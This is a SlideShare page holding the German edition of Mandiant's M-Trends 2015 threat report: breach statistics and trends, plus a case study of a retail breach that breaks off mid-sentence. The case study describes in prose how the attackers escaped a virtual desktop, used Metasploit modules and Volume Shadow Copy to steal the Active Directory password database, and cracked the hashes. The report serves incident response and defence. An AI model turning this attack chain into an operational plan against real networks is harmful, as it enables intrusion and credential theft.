Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
B e r i c h t z u r B e d r o h u n g s l a g e
Ein Bericht von
der Cyberfront
M-Trends®
2015:
Sicherheits-
beratung
Ein Bericht von der CyberfrontM-Trends
Einleitung.  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  ....
www.mandiant.com	1
Einleitung
Bei Mandiant sind wir seit Jahren davon überzeugt, dass es keine
absolute Sicherheit geben k...
2 	 www.mandiant.com
Ein Bericht von der CyberfrontM-Trends
Mehrere Branchen, in denen wir in früheren
Jahren eher selten ...
www.mandiant.com	3
APT-Phishing
der analysierten Phishing-E-Mails
hatten IT- oder sicherheitsrelevante
Themen als Aufhänge...
4 	 www.mandiant.com
Ein Bericht von der CyberfrontM-Trends
Trend Nr. 1:
Opfer im Rampenlicht
Nach einem Cyberangriff find...
www.mandiant.com	5
Beim Erstellen einer Strategie für die Öffentlich-
keitsarbeit ist ein solides Verständnis des Ausma­
ß...
6 	 www.mandiant.com
Ein Bericht von der CyberfrontM-Trends
Effektive Untersuchung
von Vorfällen
Im Folgenden finden Sie e...
www.mandiant.com	7
4	
U.S. Department of Homeland Security and U.S. Secret Service: „Backoff Malware: Infection Assessment...
8 	 www.mandiant.com
Ein Bericht von der CyberfrontM-Trends
Fallstudie
Bei einem Hackerangriff auf eine große US-amerikani...
www.mandiant.com	9
So funktioniert
psexec_command
Der auszuführende Befehl und eine Text­
datei für die Ausgabe werden in ...
10 	 www.mandiant.com
Ein Bericht von der CyberfrontM-Trends
Alle POS-Terminals in
der gesamten Kauf-
hauskette nutzten
de...
www.mandiant.com	11
Abbildung 3: Verlauf des Angriffs
Der Angreifer bricht aus der virtualisierten
Anwendungsumgebung aus ...
12 	 www.mandiant.com
Ein Bericht von der CyberfrontM-Trends
Fazit : Wo Geld ist, sind auch Kriminelle nicht weit. Einzelh...
www.mandiant.com	13
E
s ist eine Art Wettrüsten: Sicherheitsteams
implementieren neue Sicherheitsmaßnah­
men und Angreifer...
14 	 www.mandiant.com
Ein Bericht von der CyberfrontM-Trends
Bessere Verstecke für Webshells
Webbasierte Backdoors, die so...
www.mandiant.com	15
In vergangenen Jahren hatten wir nur wenige WMI-
basierte Angriffe beobachtet. Das lag vermutlich
dara...
16 	 www.mandiant.com
Ein Bericht von der CyberfrontM-Trends
Abbildung 7: So verschafften Angreifer sich mit WMI dauerhaft...
www.mandiant.com	17
Der String könnte zusätzlichen PowerShell-Code
enthalten, beispielsweise ein einfaches Download-
Tool ...
18 	 www.mandiant.com
Ein Bericht von der CyberfrontM-Trends
Da LSA erweiterbar ist, kann es auch um speziell
erstell­te M...
www.mandiant.com	19
Dieses sogenannte „goldene Ticket“ kann offline
erstellt werden und eine unbegrenzte Gültigkeits-
daue...
20 	 www.mandiant.com
Ein Bericht von der CyberfrontM-Trends
I
m Verlauf des Jahres 2014 konnten wir mehrere
Angriffe zu r...
www.mandiant.com	21
12	
https://www.fireeye.com/blog/threat-research/2014/04/crimeware-or-apt-malwares-fifty-shades-of-gre...
22 	 www.mandiant.com
Ein Bericht von der CyberfrontM-Trends
Diese Gruppe schien es auf ähnliche Ziele abgese­
hen zu habe...
www.mandiant.com	23
D
as Thema Cybersecurity interessiert in­
zwischen ein breites Publikum. Angesichts
dieser Tatsache so...
24 	 www.mandiant.com
Ein Bericht von der CyberfrontM-Trends
Über Mandiant
Mandiant, ein Tochterunternehmen von FireEye, h...
Mandiant, ein Tochterunternehmen von FireEye®
 | (+1) 703.683.3141 | (+1) 800.647.7020 | info@mandiant.com | www.mandiant....
M-Trends 2015: Ein Blick in die Praxis
Upcoming SlideShare
Loading in …5
×

M-Trends 2015: Ein Blick in die Praxis

1,445 views

Published on

Dieser Jahresbericht von Mandiant, einem FireEye-Unternehmen, zeigt anhand von Statistiken und Fallstudien neueste Entwicklungen im Bereich Advanced Persistent Threats (APTs) auf.

Published in: Technology
  • Be the first to comment

  • Be the first to like this

M-Trends 2015: Ein Blick in die Praxis

  1. 1. B e r i c h t z u r B e d r o h u n g s l a g e Ein Bericht von der Cyberfront M-Trends® 2015: Sicherheits- beratung
  2. 2. Ein Bericht von der CyberfrontM-Trends Einleitung. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 Die Opfer in Zahlen. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 Trend Nr. 1: Opfer im Rampenlicht. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 Eine gut informierte Öffentlichkeit. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 Steigende Erwartungen. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 Warum werden Angriffe zunehmend bekannt gegeben?. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 Trend Nr. 2: Einzelhändler im Fadenkreuz. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 Virtuelle Anwendungsserver als Einfallstor. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 Neue Tools, Methoden und Prozesse. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 Mehr Angriffe auf Online-Shops in Regionen mit Chip-und-PIN-Authentifizierung. . . . . . . . 7 Empfehlungen. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12 Trend Nr. 3: Raffiniertere Angriffsabläufe. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 Hacken von VPN. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 Bessere Tarnung für Malware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 Tools und Tricks für den Kennwortdiebstahl . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18 Navigation mit WMI und PowerShell. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19 Trend Nr. 4: Die Grenzen verschwimmen – Kriminelle und APT-Actors imitieren einander. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20 Im Zeichen der Unsicherheit die Absicht durchschauen – kein leichtes Unterfangen. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20 Welche Rolle spielen diese Unterschiede? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22 Schlussfolgerung. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23 Über Mandiant. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24 Über FireEye. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24 Inhalt
  3. 3. www.mandiant.com 1 Einleitung Bei Mandiant sind wir seit Jahren davon überzeugt, dass es keine absolute Sicherheit geben kann. Die Ereignisse des Jahres 2014 bestätigen dies. D ie Wirksamkeit der Sicherheitsmaßnah­men in Unternehmen ist im vergangen­en Jahr leicht gestiegen. Trotzdem geht das Wett­ rüsten zwischen Angreifern und Verteidigern wei­ ter und Hacker finden ständig neue Methoden, um Sicherheitsmaßnahmen zu um­gehen. In „M-Trends 2014“ berichteten wir, dass die Cyber­ security sich von einem Thema, an dem einige weni- ge IT-Verantwortliche interessiert waren, zu einer der obersten Prioritäten für die Unternehmens­ leitung entwickelt hatte. In diesem Jahr rückte die Cybersicherheit – oder streng genommen die Cyber­unsicherheit – in den Blickpunkt der Öffent­ lichkeit. Seit Jahresbeginn 2015 wurde das Thema von US-Präsident Obama in seiner Ansprache zur Lage der Nation¹, als Grundlage für einen Holly- wood-Film² und selbst in einem Gag bei der Verlei- hung des Gol­den Globe³ aufgegriffen. Da die Berater von Mandiant nach einem schwerwie- genden Angriff oft unter den Ersten sind, die eine kritische Situation analysieren, haben wir einen be- sonders guten Einblick in die sich ändernden Motive und Taktiken von Hackern. Wir ar­beiten seit über zehn Jahren mit Kunden in mehr als 30 Branchen weltweit zusammen. Die in diesem Dokument prä­ sentierten Erkenntnisse und Analysen beruhen auf der Erfahrung, die wir bei der Untersuchung Hun- derter kompromittierter Infrastrukturen gesam- melt haben. Unternehmen haben kleine Fortschritte zu verzeichnen, doch Hacker bleiben noch immer zu lange unentdeckt, nachdem sie in eine Unternehmens­umgebung ein­ gedrungen sind. Der Mittelwert lag 2014 bei 205 Tagen, im Vergleich zu 229 Tagen im Vorjahr. Der Anteil der Unternehmen, die ein Eindringen von Hackern intern aufdeckten, ging sogar leicht zurück: 2014 wurden in 69 Prozent der von uns untersuch­ ten Fälle die betroffenen Unternehmen von der Poli- zei oder einem anderen Dritten auf die Sicherheits­ verletzung aufmerksam gemacht, 2013 waren es 67 Prozent und im Jahr davor 63 Prozent. Der Einzelhandel hatte mit den meisten Vorfällen zu kämpfen, da Angreifer neue Metho­den zum Stehlen von Kreditkartendaten von POS-Terminals ausnutzten. In Regionen, wo Kreditkarten mit einem Prozessorchip und einer PIN geschützt sind, stieg die Anzahl der Angriffe auf E-Commerce- Unternehmen und Dienstleister, die Online- Zahlungen abwickeln. Mehrere Branchen, in denen wir bislang eher selten Vorfälle zu verzeichnen hatten, gehörten 2014 zu den wichtigsten Zielen von Internetkriminellen, darunter Unternehmens- und Beratungsservices, das Gesundheitswesen sowie Behörden und inter- nationale Organisationen. Wenn Sicherheitsteams neue Abwehrmaßnah­men installieren, finden Hacker neue Methoden, um sie zu umgehen. Das zeigte sich auch 2014, als Angrei­ fer neue Methoden bzw. raffiniertere Versionen bekannter Methoden nutzten, um virtuelle private Netzwerke (VPN) zu hacken, unentdeckt zu bleiben, Anmeldedaten zu stehlen und über einen langen Zeitraum hinweg Zugriff auf die gehackten Umge- bungen zu erhalten. Darüber hinaus ging 2014 eine Rekordzahl von Op- fern der Internetkriminalität an die Öffentlichkeit. Eine der ersten Fragen, die immer ge­stellt wird, war dabei schwerer zu beantworten als in der Vergan- genheit: Wer war das? Die Grenzen zwischen „gewöhnlichen“ Internetkri­minellen und staatlich gesponserten Angreifern verschwimmen zuneh- mend, da Erstere immer raffinierter werden und Letztere oft gängige Schwarzmarkttools verwen- den, um in der „Szene“ weniger aufzufallen. Zusammenfassend lässt sich sagen, dass die Bedro­ hungslage derzeit komplexer ist als je zuvor. Für Sicher­heitsteams bedeutet das, dass es immer schwie­riger – und immer wichtiger – wird, Angriffs­ versuche zu entdecken, zu analysieren, abzuwehren und eventuelle Schäden schnell zu beheben. 1 Michael D. Shear, The New York Times, „Obama to Announce Cybersecurity Plans in State of the Union Preview“, Januar 2015 2 Sheri Linden, The Hollywood Reporter, „Blackhat: Film Review“, Januar 2015 3 Christopher Palmeri, Bloomberg, „Hollywood ‘Spoiled Brats’ Are Easy Targets at Golden Globes“, Januar 2015
  4. 4. 2 www.mandiant.com Ein Bericht von der CyberfrontM-Trends Mehrere Branchen, in denen wir in früheren Jahren eher selten Vorfälle untersucht hatten, gehörten 2014 zu den wichtigsten Zielen von Internetkriminellen, darunter: Unternehmens- und Beratungsservices Staatliche und internationale Organisa- tionen Gesundheitswesen 6 % Gesundheits- wesen 5 % Transport- wesen 3 % Luft-, Raum- fahrt- und Rüstungs- industrie 7 % Juristische Dienstleister 8 % Sonstige 7 % IT und andere High-Tech- Branchen 8 % Bau- und Inge- nieurwesen 17 % Unternehmens- und Beratungsservices 7 % Staatliche und interna- tionale Organisationen 14 % Einzelhandel 10 % Finanzdienstleis- tungen 3% 8 % Medien und Unter- haltung 5% Mehrere wichtige Branchen waren bei unseren Untersuchungen deutlich stärker oder weniger stark vertreten als in den Vorjahren: Einzelhandel: Anstieg von 4 % auf 14 % Medien und Unterhaltung: Rückgang von 13 % auf 8 % Branchen, in denen Mandiant Angriffe untersuchte Die Opfer in Zahlen Hacker nahmen 2014 ein breites Spektrum an Branchen ins Visier, darunter mehre- re, die in früheren Jahren kaum von Internetkriminalität betroffen waren. Im Schnitt wurden Angriffe rascher aufgedeckt als 2013, doch die Angreifer konnten noch im- mer viel zu lange unbemerkt in gehackten Umgebungen ihr Unwesen treiben. Der Anteil der Opfer, die einen Angriff selbst bemerkten, ging zurück.
  5. 5. www.mandiant.com 3 APT-Phishing der analysierten Phishing-E-Mails hatten IT- oder sicherheitsrelevante Themen als Aufhänger. Viele stamm- ten angeblich von der IT-Abteilung des angegriffenen Unternehmens oder einem Anbieter von Antivirensoftware. 78 % der Phishing- E-Mails wurden an Arbeitstagen versandt. 72 % So Sa Fr Do Mi Di Mo Die Bedrohungslage im Überblick Belästigung Datendiebstahl Internetkriminalität Hacktivismus Sabotage Ziel Zugriff und Verbreitung ökonomischer bzw. politischer Vorteil finanzielle Bereicherung Verleumdung, negative öffentliche Aufmerksamkeit Unterbrechung des Betriebs Beispiel Botnetze und Spam APT-Gruppen (Advanced Persistent Threat) Kreditkarten- diebstahl Verunstaltung der Website Löschen von Daten Gezielter Angriff Merkmal oft automa- tisiert anhaltend oft opportu- nistisch auffällig konflikt- motiviert Angreifer verfolgen immer vielfältigere politische und ökonomische Ziele. Zeit zwischen den ersten nachweisbaren Spuren eines Angriffs bis zu seiner Feststellung 205 Tage Mittelwert der Zeitspanne, die Angrei- fer in gehackten Netzwerken unbemerkt blieben 24 Tage weniger als 2013 Längste Präsenz: 2982 Tage So werden Angriffe aufgedeckt 31 % der Opfer bemerkten den Vorfall unterneh- mensintern. 69 % der Opfer wurden von einem Dritten auf den Angriff aufmerksam gemacht.
  6. 6. 4 www.mandiant.com Ein Bericht von der CyberfrontM-Trends Trend Nr. 1: Opfer im Rampenlicht Nach einem Cyberangriff finden betroffene Unternehmen sich immer häufiger im Brennpunkt eines Medienspektakels wieder – und sollen alle Einzelheiten des An- griffs offenlegen. I m Verlauf des Jahres 2014 arbeiteten wir mit über 30 Unternehmen zusammen, die die Öffentlichkeit über einen Datendiebstahl informieren mussten – oft im grellen Scheinwer- ferlicht einer Pressekonferenz. Unserer Erfah­ rung nach tragen bestätigte Informationen über den Umfang und die Reichweite eines Angriffs dazu bei, dass das betroffene Unternehmen kompetent und souverän erscheint. In der Regel lassen sich dadurch auch das spätere Revidieren vorangegangener Meldungen und der damit ver- bundene Verlust an Glaubwürdigkeit vermeiden. Eine gut informierte Öffentlichkeit Eine scheinbar endlose Kette von Meldungen über Datendiebstähle sensibilisierte die Öffent­lichkeit 2014 für die Gefahren und möglichen Auswirkun- gen gezielter Cyberangriffe. Das führte dazu, dass bei jeder neuen Enthüllung fundiertere und de- tailliertere Fragen an die Opfer gestellt wurden. Die Medien, Partner, Investoren und Kunden wollen inzwischen weit mehr wissen als wann der Angriff erfolgte und welche Daten betroffen waren. Sie verlangen detaillierte Angaben über alles, vom be- nutzten Malwaretyp bis hin zu den Methoden, mit denen die Angrei­fer sich den Zugriff auf Unterneh­ mensressour­cen offen halten konnten. Zudem stehen die Opfer von Cyberangriffen zuneh­mend unter dem Druck, die Identität des Angreif­ers bekannt zu geben. Wir werden häufig schon am ersten Tag einer Untersuchung gefragt, welche Hackergruppe hinter einem Angriff steckt. Zu diesem Zeitpunkt haben wir jedoch gerade erst damit begonnen, die verfügbaren Fakten zusam- menzutragen. Gleichzeitig wird es immer schwerer, diese Frage überhaupt zu be­antworten, da die ver- schiedenen „Verdächtigen“ zunehmend dieselben Tools benutzen (siehe Trend Nr. 4: „Die Grenzen verschwimmen – Kriminelle und APT-Actors imitie- ren einander“ auf Seite 20). Steigende Erwartungen Da das öffentliche Interesse an Cyberangriffen steigt, wird den Verantwortlichen in betroffenen Unternehmen zunehmend klar, wie wichtig eine wirksame und konsistente Öffentlichkeitsarbeit ist, wenn Hacker in die IT-Infrastruktur des Unterneh- mens eingedrungen sind. Immer mehr Cyberan- griffe werden öffentlich bekannt gegeben. Für die Opfer ist das mit schwierigen Ent­scheidungen darüber verbunden, wie viele Details sie preisgeben möchten – und diese Ent­scheidungen müssen oft getroffen werden, wenn noch lange nicht alle Fak- ten bekannt sind. Beim Erstellen einer Strategie für die Öffentlichkeitsarbeit ist ein solides Ver- ständnis des Ausmaßes und der Reichweite des Angriffs unverzichtbar. Nur so lassen sich das spätere Revidieren vorangegangener Meldungen und der damit verbundene Verlust an Glaubwürdigkeit vermeiden.
  7. 7. www.mandiant.com 5 Beim Erstellen einer Strategie für die Öffentlich- keitsarbeit ist ein solides Verständnis des Ausma­ ßes und der Reichweite des Angriffs unverzichtbar. Nur so lassen sich das spätere Revidie­ren vorange- gangener Meldungen und der damit verbun­dene Verlust an Glaubwürdig­keit vermei­den. Zudem fällt es vielen betroffenen Unternehmen schwer, die Berichterstattung unter Kontrolle zu behalten. Öffentliche Spekulationen darüber, wie es den Angreifern gelungen sein könnte, in ein Un- ternehmen einzudringen, können die Reaktion auf einen Angriff beispielsweise ernst­haft behindern. Wir haben in mehreren Fällen beobachtet, dass Si- cherheitsexperten bereits wertvolle Zeit mit dem Widerlegen solcher Hypo­thesen verbringen mussten, noch bevor sie das Ausmaß des Angriffs abschätzen oder ihn eindämmen konnten. Warum werden Angriffe zunehmend bekannt gegeben? Wir werden oft gefragt, warum sich heute mehr Unternehmen dafür entscheiden, einen erfolgrei­ chen Angriff bekannt zu geben. Wir können diese Frage natürlich nicht für jedes Unternehmen defini- tiv beantworten, aber uns sind zwei Faktoren bekannt, die diesen Trend fördern: Erstens mussten wir 2014 im Vergleich zu den Vorjahren häufiger auf Angriffe reagieren, bei denen Kreditkarten- und andere personenbezogene Daten gestohlen wur­ den. Viele Unternehmen müssen solche Fälle bekannt geben, weil gesetzliche Bestimmungen dies vorschreiben. Zweitens wurden 69 Prozent der Angriffe, die wir 2014 untersuchten, nicht vom Opfer selbst aufge- deckt, sondern von einem unternehmensexternen Dritten, beispielsweise einem Zulieferer, Kunden oder den Ermittlungsbehörden. Mit anderen Worten: Die Verantwortlichen in den betroffenen Unternehmen mussten davon ausge­ hen, dass nicht nur sie selbst und die Angreifer wussten, dass ein Angriff stattgefunden hatte. Unabhängig davon, ob die Öffentlichkeit über einen erfolgreichen Angriff informiert werden soll oder nicht, verlangen die Entscheidungs­trä­ger innerhalb des Unternehmens natürlich Antworten auf zahl­ reiche Fragen – und zwar sofort. Die Untersuchung kann jedoch Wochen oder sogar Monate dauern und die zur Beantwortung dieser Fragen erforder­ lichen Fakten schälen sich oft erst im Verlauf der Untersuchung heraus. Deshalb ist es wichtig, das Ausmaß und die Reichweite eines Sicherheitsvor- falls zu kennen, bevor über die Strategie für die Bekanntgabe der Details entschieden wird. Fazit : Die Opfer von Cyberangriffen gehen heute mit größerer Wahrscheinlich­ keit an die Öffentlichkeit als früher. Das Medieninteresse ist dabei oft groß. Repor­ tern, Kunden und Geschäftspartnern ist zunehmend bewusst, dass nicht alle Angrif­ fe abgewehrt werden können. Gleichzeitig verlangen sie jedoch mehr Informatio­ nen und stellen detailliertere Fragen als noch vor wenigen Jahren. Unternehmen benö­tigen eine effektive Strategie für die Öffentlichkeitsarbeit, um sich auf die da­ raus resultieren­den Diskussionen vorzubereiten. Die besten Strategien basieren auf Fakten aus der gründlichen Untersuchung des Vorfalls.
  8. 8. 6 www.mandiant.com Ein Bericht von der CyberfrontM-Trends Effektive Untersuchung von Vorfällen Im Folgenden finden Sie einige häufig gestellte Fragen von Reportern, Investoren, Kunden und anderen Interessenten an Unternehmen, die Hackern zum Opfer gefallen sind. Alle Entscheidungsträger und sonstigen Personen, die für das Unter­ nehmen sprechen, sollten die genauen Antworten auf diese Fragen verstehen, um die Verbreitung mehrdeutiger oder inkonsistenter Informationen zu vermeiden. Wie sind die Angreifer in Ihre Infrastruk­ tur eingedrungen? Angreifer nutzen in der Regel eine Kombination aus Social Engineering und einer oder mehreren Schwachstellen, die noch nicht bekannt bzw. behoben sind. Als Einfallstor dient dabei beispielsweise ein mit dem Internet verbundener Server oder ein Malware-Anhang in einer E-Mail, der echt genug aussieht, um vom Empfänger geöffnet zu werden. Manche Angreifer infizieren sogar Websites, die von ihren anvisierten Opfern häufig besucht werden. Es ist wichtig, dass ein Unternehmenssprecher erklären kann, wie die Angreifer in die Infrastruktur des Unternehmens einge­ drungen sind. Noch wichtiger ist möglicherweise, dass er oder sie auch sagen kann, ob dieses Einfallstor geschlos- sen und die Bedrohung eingedämmt wurde. Wie haben die Angreifer sich den Zugang zu Ihrer Infrastruktur offengehalten? Angreifer versuchen meist, sich dauerhaften Zugang zu einer Umgebung zu verschaffen. Um sie vollständig aus Ihrer Infrastruktur zu entfernen, müssen Sie alle genutz- ten Einfallstore finden und schließen. Zu den meistgenutz- ten Einfallstoren gehören sogenannte Backdoors, Web- shells sowie der Zugang zu Ihrem VPN und anderen Syste- men für den Fernzugriff. Wie ist der Angriff abgelaufen? Wenn Sie nachvollziehen können, wie ein Angreifer in Ihre Infrastruktur eindringen und Daten stehlen konnte, haben Sie den ersten Schritt zur künftigen Abwehr ähnlicher An- griffe getan. Außerdem ist es schwierig, die Auswirkungen eines Angriffs zu ermitteln und zu beheben, wenn Sie das genaue Ausmaß des Angriffs nicht kennen. Welche Daten wurden gestohlen? Um herauszufinden, welche Daten die Angreifer kopiert und entwendet haben, ist meist eine forensische Analyse der betroffenen Systeme erforderlich. Mitunter kann selbst eine solche Analyse diese Frage nicht vollständig beantworten. Sie sollten in jedem Fall Ihre Rechtsabteilung einbeziehen, um zu ermitteln, welche gesetzlichen Verpflichtungen sich aufgrund der Art der gestohlenen bzw. möglicherweise gestohlenen Daten für Ihr Unternehmen ergeben. Haben Sie den Vorfall eingedämmt? Wer die ersten vier Fragen beantworten kann, hat gute Voraussetzungen für die Beantwortung dieser Frage. Wenn Sie den Plan der Angreifer und den Verlauf des An- griffs aufgedeckt haben, können Sie besser auf den Angriff reagieren und mit der Schadensbehebung beginnen.
  9. 9. www.mandiant.com 7 4 U.S. Department of Homeland Security and U.S. Secret Service: „Backoff Malware: Infection Assessment“, August 2014 Trend Nr. 2: Einzelhändler im Fadenkreuz Allein im Jahr 2014 wurden bei über 1000 Einzelhändlern Kundendaten gestohlen, sodass unzählige Kunden ihre Kreditkarten ersetzen lassen mussten.4 Neben der riesigen Anzahl der Angriffe fielen unseren Analysten auch mehrere neue Angrei­ fergruppen auf, die diese gebeutelte Branche mit speziellen Tools und Methoden ins Visier nehmen. Virtuelle Anwendungsserver als Einfallstor Mithilfe der Anwendungsvirtualisierung lassen sich virtuelle Desktops konfigurieren, bei denen Benut- zer sich per Fernzugriff anmelden, um ei­nen be- grenzten Zugriff auf bestimmte Program­me zu er­ halten. Bei korrekter Konfiguration ist ein virtueller Desktop vollständig von dem physi­schen Server ab- geschirmt, auf dem er ausgeführt wird. Die Benut- zer kommen also nicht aus dem virtuellen Desktop „heraus“ und haben keinen direkten Zugriff auf den physischen Server. In manchen Fällen entstehen je- doch schon durch kleine Konfigurationsfehler Lü­ cken in der Abschirmung, die es Angreifern ermögli- chen, aus der virtuellen Umgebung „auszubrechen“ und sich direkten Zugriff auf den physischen Server zu verschaffen. In jedem von uns untersuchten Fall mit diesem An- griffsmuster wurde dieselbe Schwachstelle ausge­ nutzt: Für den Fernzugriff auf die Anwen­dung wa­ ren nur ein Benutzername und Kenn­wort erforder- lich. Mit Zwei-Faktor-Authentifizierung lässt sich dieses Einfallstor nahezu vollständig schließen. Neue Tools, Methoden und Prozesse Die von uns beobachteten neuen Angreifergruppen nutzten auch neue Tools, Methoden und Prozesse. Die Expertise der Angreifer deckte das gesamte Spektrum ab, von Anfängern mit gängigen Schwarz­ markttools bis hin zu technisch versierten Gruppen mit raffinierter, speziell auf be­stimmte POS-Syste­ me abgestimmter Malware zum Abschöpfen von Kreditkartendaten. Wir konnten keinen Zusammenhang zwischen den Fähigkeiten und dem Erfolg der Angreifer feststel- len. Insbesondere für US-amerikanische Einzel­ händler erwies sich Standardmalware vom Schwarz­markt für den Diebstahl von Kreditkarten- daten als ebenso gefährlich wie „professionelle“ Produkte. Jede der von uns untersuchten Angrei­ fergruppen konnte die Umgebung ihres Opfers unbemerkt ausspionieren, sich Zugang zu den POS-Terminals verschaffen und die Malware für den Diebstahl der Kreditkartendaten installieren. Mehr Angriffe auf Online-Shops in Regionen mit Chip-und-PIN- Authentifizierung Während POS-Terminals in Europa und vielen an- deren Regionen längst einen in der Kreditkarte ent­ haltenen Prozessorchip und eine PIN zur Authenti­ fizierung nutzen, hat sich das nach sei­nen Entwick­ lern Europay, MasterCard und Visa benannte EMV- Verfahren in den USA noch immer nicht durchge- setzt. Das soll sich nun endlich ändern. EMV-fähige Kreditkarten generieren einen eindeu­ tigen Code für jede Transaktion und erschweren Hackern das Fälschen von Trans­aktionen dadurch erheblich. Möglicherweise konzentrieren sich Cyber­kriminelle stattdessen auf leichtere Beute. In Ländern, in denen standardmäßig EMV verwendet wird, untersuchten wir 2014 im Vergleich zu frühe­ ren Jahren eine größere Anzahl von Angriffen auf E-Commerce-Unternehmen und Dienstleister, die Online-Zahlungen abwickeln.
  10. 10. 8 www.mandiant.com Ein Bericht von der CyberfrontM-Trends Fallstudie Bei einem Hackerangriff auf eine große US-amerikanische Kaufhauskette wurden die Daten von Millionen von Kreditkarten gestohlen Dieser Angriff ist typisch für eine Ma­sche, der 2014 eine Reihe US-amerika­nischer Einzelhändler zum Opfer fielen: Die An- greifer verschafften sich mit gültigen An- meldedaten per Fernzugriff Zugang zu ei- nem System des Opfers und nutzten dann dessen Intranet, um Malware auf den POS-Terminals in den Ladengeschäften zu installieren. Im hier beschriebenen Fall bemerkte das Opfer den Angriff erst, als Behörden drei Mo­nate später darauf auf- merksam mach­ten. Eindringen in das Netzwerk Der Angreifer meldete sich mit gültigen Anmeldedaten bei einem Anwendungs- server der Kaufhauskette an und erhielt einen virtuellen Desktop mit begrenzten Privilegien. Wir konnten keine Anzeichen für fehlgeschlagene Anmeldeversuche fin- den und gehen daher davon aus, dass er sich die Anmeldedaten vor dem Angriff beschafft hatte. Wie ihm das gelang, geht aus den uns vorliegenden Daten nicht hervor. Der Angreifer nutzte dann einen klei­nen Fehler in der Konfiguration des virtuellen Desktops aus, um sich zusätzliche Zu- griffsrechte zuzuweisen, darun­ter Zugang zu einem Befehlszeilentool, mit dem er di- rekt auf dem Anwendungs­server Befehle ausführen konnte. Damit lud er über Windows FTP ein Tool zum Kopieren von Kennwörtern herunter, mit dem er in den Besitz des Administratorkennworts für den Anwendungsserver gelangte. Alle Syste­me im Intra­net der Kaufhauskette nutzten dasselbe Administratorkennwort. All das dauerte nur wenige Minuten. Ausspionieren und Infizieren des Netzwerks Der Angreifer nutzte zunächst das Frame- work Metasploit, um die Infra­struktur des Opfers auszuspionieren. Metasploit ist ein Open-Source-Framework für Penetra- tionstests, das eine riesige Auswahl an Modulen zum Aufdecken und Ausnutzen von Schwachstellen enthält. Dank dieser Vielfalt erfre­ut es sich sowohl bei Sicher- heitsexperten als auch bei Internetkrimi- nellen großer Beliebtheit. Im vorliegenden Fall wurde das Modul psexec_command genutzt, mit dem Be­fehle als Windows-Service auf einem anderen System ausgeführt werden können. Alle Aktionen von psexec_command werden in den Logdateien des Systems protokolliert, auf dem sie ausgeführt werden. Der Angreifer durchsuchte weiterhin Sys- teme im Intranet, konzentrierte sich aber zunehmend auf den Domänencontroller der Zentraldomäne des Unternehmens- netzwerks. Ein Domänencontroller ist ein Server, der zur Administration der Au- thentifizierung in einer Windows-Umge- bung benötigt wird. Dieser Domänencon- troller hatte dasselbe Administratorkenn­ wort wie der zuerst gehackte Server und war daher eine leichte Beute. Der Angrei­ fer nutzte das Metasploit-Modul ntdsgrab, um die NTDS-Datenbank und System Registry Hive zu kopieren. Die NTDS-Datenbank enthält für den Domänencontroller wichtige Daten über Active Directory, unter anderem Benut- zernamen und Kennwort-Hashes. Das Modul ntdsgrab nutzt den Volume Shadow Copy Service (VSS), um eine Schattenko­ pie der Partition zu erstellen, auf der die NTDS-Datenbank gespei­chert ist. Der eigentl­iche Zweck von VSS ist das Erstel- len legitimer Momentaufnahmen für die Datensicherung und -wiederherstellung. Der Angreifer missbrauchte den Dienst jedoch, um die NTDS-Datenbank zu steh­ len. Im Anschluss nutzte er andere Tools, um die Kennwort-Hashes der Domänen- administratoren zu finden und zu knacken. Damit stand ihm praktisch die gesamte Umgebung offen. Der Angreifer stieg nun auf altbewährte Methoden zum Ausspionieren von Netz­ werken um, darunter nicht interaktive An- meldeversuche, das Tool PsExec aus den Microsoft SysInternals und Anmeldever- suche über das Remote Desktop Protocol (RDP). Nachdem er sich mit den Anmelde- daten des Domänenadministrators auf einem virtualisierten Anwendungsserver angemeldet hatte, konnte der Angreifer sich via RDP mit umfangreichen Zugriffs- rechten 